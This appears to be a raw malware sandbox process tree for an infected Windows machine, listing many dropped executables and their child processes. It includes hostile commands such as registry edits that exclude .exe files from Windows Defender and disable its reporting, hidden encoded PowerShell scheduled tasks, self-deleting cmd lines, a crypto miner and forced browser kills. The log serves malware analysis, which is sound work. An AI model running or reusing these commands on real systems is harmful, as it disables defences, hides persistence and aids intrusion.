        "C:\Users\Admin\AppData\Local\Temp\2X8NPJO8IdFm7r0zsSEeWJ5xoVg\Legacysurvival.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Legacysurvival" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1512 --field-trial-handle=1808,i,4900348683730020821,15110471353106871607,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1956
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
        5⤵
        
        PID:684
      - C:\Windows\system32\taskkill.exe
        
        taskkill /IM chrome.exe /F
        6⤵
        Kills process with taskkill
        
        PID:5496
    - - C:\Users\Admin\AppData\Local\Temp\2X8NPJO8IdFm7r0zsSEeWJ5xoVg\Legacysurvival.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2X8NPJO8IdFm7r0zsSEeWJ5xoVg\Legacysurvival.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Legacysurvival" --app-path="C:\Users\Admin\AppData\Local\Temp\2X8NPJO8IdFm7r0zsSEeWJ5xoVg\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2260 --field-trial-handle=1808,i,4900348683730020821,15110471353106871607,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2556
    - - C:\Users\Admin\AppData\Local\Temp\2X8NPJO8IdFm7r0zsSEeWJ5xoVg\Legacysurvival.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2X8NPJO8IdFm7r0zsSEeWJ5xoVg\Legacysurvival.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Legacysurvival" --mojo-platform-channel-handle=1884 --field-trial-handle=1808,i,4900348683730020821,15110471353106871607,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:528
- - C:\Users\Admin\AppData\Local\Temp\a\boblspsqgegf.exe
    "C:\Users\Admin\AppData\Local\Temp\a\boblspsqgegf.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3296
  - - C:\Windows\system32\taskkill.exe
      taskkill /im chrome.exe /T /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4588
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\boblspsqgegf.exe
      4⤵
      PID:4888
- - C:\Users\Admin\AppData\Local\Temp\a\newumma.exe
    "C:\Users\Admin\AppData\Local\Temp\a\newumma.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1348
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      PID:4532
    - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1456
  - - C:\Users\Admin\AppData\Local\Temp\kos2.exe
      "C:\Users\Admin\AppData\Local\Temp\kos2.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1020
    - - C:\Users\Admin\AppData\Local\Temp\set16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\set16.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4032
      - C:\Users\Admin\AppData\Local\Temp\is-V454E.tmp\is-SOF2A.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-V454E.tmp\is-SOF2A.tmp" /SL4 $A0078 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:4356
        
        C:\Program Files (x86)\MyBurn\MyBurn.exe
        
        "C:\Program Files (x86)\MyBurn\MyBurn.exe" -i
        7⤵
        
        PID:2244
        
        C:\Program Files (x86)\MyBurn\MyBurn.exe
        
        "C:\Program Files (x86)\MyBurn\MyBurn.exe" -s
        7⤵
        Executes dropped EXE
        
        PID:4332
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Query
        7⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" helpmsg 20
        7⤵
        
        PID:3440
    - - C:\Users\Admin\AppData\Local\Temp\K.exe
        
        "C:\Users\Admin\AppData\Local\Temp\K.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4624
  - - C:\Users\Admin\AppData\Local\Temp\latestX.exe
      "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
      4⤵
      Executes dropped EXE
      PID:712
- - C:\Users\Admin\AppData\Local\Temp\a\ca.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ca.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1324
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 764
      4⤵
      Program crash
      PID:4108
- - C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe
    "C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1408
  - - C:\Users\Admin\AppData\Local\Temp\ohtfjmxqk.exe
      "C:\Users\Admin\AppData\Local\Temp\ohtfjmxqk.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:816
    - - C:\Users\Admin\AppData\Local\Temp\ohtfjmxqk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ohtfjmxqk.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        
        PID:4992
- - C:\Users\Admin\AppData\Local\Temp\a\fra.exe
    "C:\Users\Admin\AppData\Local\Temp\a\fra.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4128
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 764
      4⤵
      Program crash
      Suspicious use of WriteProcessMemory
      PID:5084
- - C:\Users\Admin\AppData\Local\Temp\a\bus50.exe
    "C:\Users\Admin\AppData\Local\Temp\a\bus50.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:5028
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6pp4wL3.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6pp4wL3.exe
      4⤵
      PID:4952
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D7EC.tmp\D7ED.tmp\D7EE.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6pp4wL3.exe"
        5⤵
        
        PID:4580
- - C:\Users\Admin\AppData\Local\Temp\a\Veeam.Backup.Service.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Veeam.Backup.Service.exe"
    3⤵
    - Executes dropped EXE
    PID:4536
- - C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"
    3⤵
    PID:4680
  - - C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"
      4⤵
      PID:5220
  - - C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"
      4⤵
      PID:1344
  - - C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\chungzx.exe"
      4⤵
      PID:3252
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
        5⤵
        
        PID:1808
      - C:\Windows\SysWOW64\PING.EXE
        
        PING 127.0.0.1 -n 2
        6⤵
        Runs ping.exe
        
        PID:7984
      - C:\Windows\Microsoft Media Session\Windows Sessions Start.exe
        
        "C:\Windows\Microsoft Media Session\Windows Sessions Start.exe"
        6⤵
        
        PID:3480
        
        C:\Windows\Microsoft Media Session\Windows Sessions Start.exe
        
        "C:\Windows\Microsoft Media Session\Windows Sessions Start.exe"
        7⤵
        
        PID:3560
        
        C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        8⤵
        
        PID:8832
- - C:\Users\Admin\AppData\Local\Temp\a\msedge.exe
    "C:\Users\Admin\AppData\Local\Temp\a\msedge.exe"
    3⤵
    PID:5108
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:5788
- - C:\Users\Admin\AppData\Local\Temp\a\shareu.exe
    "C:\Users\Admin\AppData\Local\Temp\a\shareu.exe"
    3⤵
    - Executes dropped EXE
    PID:5896
- - C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
    "C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
    3⤵
    - Executes dropped EXE
    PID:4976
- - C:\Users\Admin\AppData\Local\Temp\a\WatchDog.exe
    "C:\Users\Admin\AppData\Local\Temp\a\WatchDog.exe"
    3⤵
    - Executes dropped EXE
    PID:3616
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 1400
      4⤵
      Program crash
      PID:2196
- - C:\Users\Admin\AppData\Local\Temp\a\yes.exe
    "C:\Users\Admin\AppData\Local\Temp\a\yes.exe"
    3⤵
    PID:920
- - C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
    3⤵
    - Executes dropped EXE
    PID:2156
  - - C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
      4⤵
      PID:6700
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /f /tn "AGP Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmp5F2.tmp"
        5⤵
        Creates scheduled task(s)
        
        PID:7764
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /f /tn "AGP Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp17A6.tmp"
        5⤵
        Creates scheduled task(s)
        
        PID:8
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4888
- - C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe"
    3⤵
    - Executes dropped EXE
    PID:5132
  - - C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe"
      4⤵
      PID:7432
- - C:\Users\Admin\AppData\Local\Temp\a\987123.exe
    "C:\Users\Admin\AppData\Local\Temp\a\987123.exe"
    3⤵
    - Executes dropped EXE
    PID:5420
- - C:\Users\Admin\AppData\Local\Temp\a\ch.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ch.exe"
    3⤵
    PID:5620
- - C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe"
    3⤵
    PID:5504
  - - C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe"
      4⤵
      PID:7184
  - - C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\undergroundzx.exe"
      4⤵
      PID:5312
- - C:\Users\Admin\AppData\Local\Temp\a\Random.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Random.exe"
    3⤵
    PID:5688
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:5592
    - - C:\Users\Admin\Pictures\iMQY1e4uFKWVFAzF84rf0kGf.exe
        
        "C:\Users\Admin\Pictures\iMQY1e4uFKWVFAzF84rf0kGf.exe"
        5⤵
        
        PID:7152
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:8848
      - C:\Users\Admin\Pictures\iMQY1e4uFKWVFAzF84rf0kGf.exe
        
        "C:\Users\Admin\Pictures\iMQY1e4uFKWVFAzF84rf0kGf.exe"
        6⤵
        
        PID:7680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:10420
    - - C:\Users\Admin\Pictures\JZFOhOo0qDfuM98fjtdVru0V.exe
        
        "C:\Users\Admin\Pictures\JZFOhOo0qDfuM98fjtdVru0V.exe" --silent --allusers=0
        5⤵
        
        PID:7132
      - C:\Users\Admin\Pictures\JZFOhOo0qDfuM98fjtdVru0V.exe
        
        C:\Users\Admin\Pictures\JZFOhOo0qDfuM98fjtdVru0V.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x70688538,0x70688548,0x70688554
        6⤵
        
        PID:4528
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\JZFOhOo0qDfuM98fjtdVru0V.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\JZFOhOo0qDfuM98fjtdVru0V.exe" --version
        6⤵
        
        PID:4124
      - C:\Users\Admin\Pictures\JZFOhOo0qDfuM98fjtdVru0V.exe
        
        "C:\Users\Admin\Pictures\JZFOhOo0qDfuM98fjtdVru0V.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=7132 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231023091218" --session-guid=eab5f86c-229d-4461-9093-c6c9c5df97a2 --server-tracking-blob=YTQ2ZTZkZGI0MTMzOGU1YzQwYjhiMTlmOGMwN2VmNjdlNDE1ODI2MjRiZWU2NThhMDRhOTRkOTFjNjU3MDdjYTp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5ODA1MjMzNC4wMDcwIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI1ODA5MThiYy1lODMwLTQ1YzEtYWFhYS1hOGU5YzM5ZTRmOWMifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7804000000000000
        6⤵
        
        PID:2652
        
        C:\Users\Admin\Pictures\JZFOhOo0qDfuM98fjtdVru0V.exe
        
        C:\Users\Admin\Pictures\JZFOhOo0qDfuM98fjtdVru0V.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6f2e8538,0x6f2e8548,0x6f2e8554
        7⤵
        
        PID:5172
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310230912181\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310230912181\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"
        6⤵
        
        PID:8632
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310230912181\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310230912181\assistant\assistant_installer.exe" --version
        6⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310230912181\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310230912181\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0xfd1588,0xfd1598,0xfd15a4
        7⤵
        
        PID:7272
    - - C:\Users\Admin\Pictures\Xv1zNDkiaaSf12R8w1Cnb6vZ.exe
        
        "C:\Users\Admin\Pictures\Xv1zNDkiaaSf12R8w1Cnb6vZ.exe"
        5⤵
        
        PID:5924
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Xv1zNDkiaaSf12R8w1Cnb6vZ.exe" & exit
        6⤵
        
        PID:5728
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:5380
    - - C:\Users\Admin\Pictures\HAdMwCcHyaXJXbCt5t2FWrQF.exe
        
        "C:\Users\Admin\Pictures\HAdMwCcHyaXJXbCt5t2FWrQF.exe"
        5⤵
        
        PID:6040
    - - C:\Users\Admin\Pictures\E5F8c4YfJzwiAIMOXv3Ms092.exe
        
        "C:\Users\Admin\Pictures\E5F8c4YfJzwiAIMOXv3Ms092.exe"
        5⤵
        
        PID:6112
    - - C:\Users\Admin\Pictures\SVAYVnnYaiwcNRZ54Mn8bV6h.exe
        
        "C:\Users\Admin\Pictures\SVAYVnnYaiwcNRZ54Mn8bV6h.exe"
        5⤵
        
        PID:7120
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:8104
      - C:\Users\Admin\Pictures\SVAYVnnYaiwcNRZ54Mn8bV6h.exe
        
        "C:\Users\Admin\Pictures\SVAYVnnYaiwcNRZ54Mn8bV6h.exe"
        6⤵
        
        PID:10668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:8812
    - - C:\Users\Admin\Pictures\Lxv3Op7qQgeVkCvwj75WJWQF.exe
        
        "C:\Users\Admin\Pictures\Lxv3Op7qQgeVkCvwj75WJWQF.exe"
        5⤵
        
        PID:7052
    - - C:\Users\Admin\Pictures\yEMzLzhsD5jTTcp2wspAYn8n.exe
        
        "C:\Users\Admin\Pictures\yEMzLzhsD5jTTcp2wspAYn8n.exe"
        5⤵
        
        PID:1332
      - C:\Users\Admin\AppData\Local\Temp\7zSCF13.tmp\Install.exe
        
        .\Install.exe
        6⤵
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\7zSD3F5.tmp\Install.exe
        
        .\Install.exe /dcCcdidRiisJ "385118" /S
        7⤵
        
        PID:4496
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        8⤵
        
        PID:8060
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        9⤵
        
        PID:9116
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        10⤵
        
        PID:8128
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        10⤵
        
        PID:8136
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        8⤵
        
        PID:5684
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        9⤵
        
        PID:6604
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        10⤵
        
        PID:4176
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        10⤵
        
        PID:4864
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gYivVkbga" /SC once /ST 01:05:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        8⤵
        Creates scheduled task(s)
        
        PID:8568
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gYivVkbga"
        8⤵
        
        PID:8760
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gYivVkbga"
        8⤵
        
        PID:5520
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 09:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\xIOpVMJ.exe\" 3Y /Ilsite_idBYH 385118 /S" /V1 /F
        8⤵
        Creates scheduled task(s)
        
        PID:3800
    - - C:\Users\Admin\Pictures\yKcBJKeN3ukLsMDNNZXCk61y.exe
        
        "C:\Users\Admin\Pictures\yKcBJKeN3ukLsMDNNZXCk61y.exe"
        5⤵
        
        PID:3012
    - - C:\Users\Admin\Pictures\sPcT3zyIsWS9Kats02WJrm67.exe
        
        "C:\Users\Admin\Pictures\sPcT3zyIsWS9Kats02WJrm67.exe"
        5⤵
        
        PID:8784
    - - C:\Users\Admin\Pictures\cOCrtSh7EJazfWoqLDrdTNT4.exe
        
        "C:\Users\Admin\Pictures\cOCrtSh7EJazfWoqLDrdTNT4.exe"
        5⤵
        
        PID:10160
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:10516
      - C:\Users\Admin\Pictures\cOCrtSh7EJazfWoqLDrdTNT4.exe
        
        "C:\Users\Admin\Pictures\cOCrtSh7EJazfWoqLDrdTNT4.exe"
        6⤵
        
        PID:11244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:3568
    - - C:\Users\Admin\Pictures\5rX8hnO4FIWvmqkRMwe7oRWh.exe
        
        "C:\Users\Admin\Pictures\5rX8hnO4FIWvmqkRMwe7oRWh.exe"
        5⤵
        
        PID:1400
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\5rX8hnO4FIWvmqkRMwe7oRWh.exe" & exit
        6⤵
        
        PID:5292
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:10972
    - - C:\Users\Admin\Pictures\FMEVh0VC23R66oqcypSXHHH0.exe
        
        "C:\Users\Admin\Pictures\FMEVh0VC23R66oqcypSXHHH0.exe"
        5⤵
        
        PID:7816
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:10020
      - C:\Users\Admin\Pictures\FMEVh0VC23R66oqcypSXHHH0.exe
        
        "C:\Users\Admin\Pictures\FMEVh0VC23R66oqcypSXHHH0.exe"
        6⤵
        
        PID:10364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:8108
    - - C:\Users\Admin\Pictures\jx38azEqDT8zlcS4JebU89NX.exe
        
        "C:\Users\Admin\Pictures\jx38azEqDT8zlcS4JebU89NX.exe" --silent --allusers=0
        5⤵
        
        PID:7616
      - C:\Users\Admin\Pictures\jx38azEqDT8zlcS4JebU89NX.exe
        
        C:\Users\Admin\Pictures\jx38azEqDT8zlcS4JebU89NX.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x66d88538,0x66d88548,0x66d88554
        6⤵
        
        PID:2964
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\jx38azEqDT8zlcS4JebU89NX.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\jx38azEqDT8zlcS4JebU89NX.exe" --version
        6⤵
        
        PID:9780
